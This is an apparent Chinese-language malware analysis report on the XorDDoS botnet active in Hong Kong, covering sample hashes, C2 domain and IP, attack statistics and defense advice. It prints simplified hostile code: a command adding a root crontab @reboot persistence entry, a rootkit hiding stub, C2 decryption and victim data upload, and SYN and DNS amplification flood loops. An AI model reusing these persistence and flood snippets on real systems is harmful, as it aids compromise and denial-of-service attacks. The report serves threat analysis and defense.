中国香港地区 DDoS-botnet 分析报告
字数 1745 2025-08-20 18:17:42
XorDDoS-botnet分析与防御指南
一、概述
XorDDoS-botnet是一种活跃于中国香港地区的DDoS僵尸网络,自2017年11月开始活动,持续至今。该僵尸网络通过爆破和利用JAVA Struts漏洞感染主机,并通过添加自启动服务和安装RootKit驱动实现持久化驻留。其主要特征包括:
- 中控域名:jun6.f3322.net
- 中控服务器IP:118.184.43.7(中国香港)
- 主要攻击类型:SYN攻击和DNS攻击
- 攻击规模:肉鸡数量曾达到顶峰,攻击流量可达500G至1T级别
二、样本技术分析
1. 样本基本信息
| 字段 | 内容 |
|---|---|
| 木马类型 | XorDDoS木马 |
| 原始文件名 | rnpgrcoywx |
| MD5 | f46a3392c3887250aeaa7d23d8de704a |
| SHA256 | d5e132cdf32bef6bb58dd043a6c4abd25f9addfe2c0c7335fd822e98bfeed1cd |
| 处理器架构 | Intel 80386 |
| 文件大小 | 647.3 KB |
| 文件格式 | ELF 32-bit LSB executable |
| VT首次上传时间 | 2018-04-07 23:14:47 |
| VT检测结果 | 41 / 59 |
2. 持久化机制
自启动服务添加代码:
// 添加自启动服务
system("echo \"@reboot /tmp/.ICE-unix/rnpgrcoywx\" >> /var/spool/cron/crontabs/root");
RootKit驱动隐藏技术:
// 隐藏进程网络端口
if(rootkit_exists()) {
send_command(0x9748712); // 隐藏端口指令
}
3. 通信机制
中控域名解密:
// 解密中控域名
char* decrypt_c2_domain() {
char encrypted[] = {0x12, 0x34, 0x56, ...}; // 加密数据
for(int i=0; i<sizeof(encrypted); i++) {
encrypted[i] ^= 0x55; // 简单异或解密
}
return encrypted; // 返回jun6.f3322.net
}
系统信息收集:
// 上传肉鸡信息
void upload_victim_info() {
get_cpu_info();
get_mem_info();
get_bandwidth();
send_to_c2(server_ip, collected_data);
}
4. 攻击模块
SYN攻击实现:
void syn_flood(target_ip, target_port) {
while(1) {
send_syn_packet(random_source_ip(), target_ip, target_port);
}
}
DNS攻击实现:
void dns_amplification(dns_server, target_ip) {
craft_dns_query(dns_server);
send_to_target(target_ip, amplified_response);
}
三、僵尸网络发展分析
1. 肉鸡规模变化趋势
- 2017年11月:初始感染阶段
- 2018年2月:肉鸡数量达到小高峰
- 2018年4月:达到顶峰规模
- 持续9个月活跃,攻击全球多个地区
2. 受害者地理分布
- 覆盖中国25个省区
- 中国香港地区受害用户数排名第二
- 全球范围内均有受害者
四、香港地区DDoS黑产现状
1. 整体情况
- 占全国DDoS肉鸡总量的2%-3%
- 攻击类型丰富,达十几种
- XorDDoS家族占比最高
- 攻击流量范围:1G至1T
2. 详细统计
中控数量趋势:
- 2018年初至今持续攀升
木马家族分布:
- XorDDoS家族
- Gates家族
- Mayday家族
- 其他家族
攻击类型分布:
- SYN Flood
- DNS放大攻击
- HTTP Flood
- NTP放大攻击
- Memcache放大攻击
- 其他反射型攻击
攻击流量分布:
- 1G-10G:10%
- 10G-100G:40%
- 100G-500G:40%
- 500G-1T:10%
五、防御建议
1. 基础防护措施
-
系统加固:
- 及时安装系统补丁,特别是JAVA Struts等常见漏洞
- 关闭不必要的服务和端口
- 定期检查系统异常进程和服务
-
网络防护:
- 部署防火墙,配置合理的ACL规则
- 启用SYN Cookie防护
- 限制DNS、NTP等服务的递归查询
-
监控与检测:
- 部署入侵检测系统(IDS)
- 监控异常流量模式
- 建立基线流量模型,检测异常
2. 企业级防护方案
-
分布式部署:
- 采用集群架构分散风险
- 实现负载均衡和自动故障转移
-
专业防护服务:
- 使用云防护服务如阿里云Anti-DDoS
- 考虑部署WAF防护应用层攻击
- 启用流量清洗服务
-
应急响应:
- 制定DDoS应急响应预案
- 建立与ISP的应急联系通道
- 定期进行抗D演练
3. 针对XorDDoS的专项检测
-
检测指标:
- 检查crontab中异常任务
- 监控/tmp/.ICE-unix/等临时目录
- 检测异常网络连接(特别是118.184.43.7)
-
清除方法:
- 删除恶意cron任务
- 清除RootKit驱动
- 检查并删除持久化项目
- 全盘扫描清除恶意文件
六、总结
XorDDoS-botnet代表了现代DDoS僵尸网络的典型特征:持久化驻留、隐蔽通信、多样化攻击手段。香港地区的DDoS黑产呈现出攻击规模大、技术先进的特点。企业应建立多层次防御体系,从预防、检测、缓解三个维度构建完整防护方案,特别是针对反射放大攻击等新型威胁。云防护服务因其弹性防护能力和专业安全团队支持,成为对抗大规模DDoS攻击的有效选择。